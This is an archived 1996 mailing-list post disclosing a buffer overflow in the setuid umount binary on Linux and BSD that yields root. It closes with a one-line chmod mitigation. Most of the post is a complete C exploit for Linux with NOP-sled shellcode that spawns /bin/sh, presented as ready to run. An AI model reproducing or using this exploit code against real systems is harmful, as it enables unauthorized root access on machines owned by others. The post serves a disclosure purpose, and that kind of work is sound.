home *** CD-ROM | disk | FTP | other *** search
-
- Linux & BSD's umount exploit
-
- Paulo Jorge Alves Oliveira (pjao@dux.isec.pt)
- Tue, 29 Oct 1996 12:38:52 +0100
-
- Hello,
-
- there is a bug in berkeley-derived umount, which allows attacker to
- get root access (see freebsd-security for details). Here is exploit for
- Linux (tested on 2.0.XX), for BSD (tested on FreeBSD 2.1) and a quick
- soluction.
-
- Best regards, Paulo
-
- -------------------------------------- linux_umount_exploit.c ----------
- #include <stdio.h>
- #include <unistd.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <fcntl.h>
- #include <sys/stat.h>
-
- #define PATH_MOUNT "/bin/umount"
- #define BUFFER_SIZE 1024
- #define DEFAULT_OFFSET 50
-
- u_long get_esp()
- {
- __asm__("movl %esp, %eax");
-
- }
-
- main(int argc, char **argv)
- {
- u_char execshell[] =
- "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
- "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
- "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
-
- char *buff = NULL;
- unsigned long *addr_ptr = NULL;
- char *ptr = NULL;
-
- int i;
- int ofs = DEFAULT_OFFSET;
-
- buff = malloc(4096);
- if(!buff)
- {
- printf("can't allocate memory\n");
- exit(0);
- }
- ptr = buff;
-
- /* fill start of buffer with nops */
-
- memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
- ptr += BUFFER_SIZE-strlen(execshell);
-
- /* stick asm code into the buffer */
-
- for(i=0;i < strlen(execshell);i++)
- *(ptr++) = execshell[i];
-
- addr_ptr = (long *)ptr;
- for(i=0;i < (8/4);i++)
- *(addr_ptr++) = get_esp() + ofs;
- ptr = (char *)addr_ptr;
- *ptr = 0;
-
- (void)alarm((u_int)0);
- execl(PATH_MOUNT, "umount", buff, NULL);
- }
-
-
- --------------------------------------------------------------------------
-
- Here is a little solution --
- chmod -s /bin/umount
- This way only root can run this command.
-
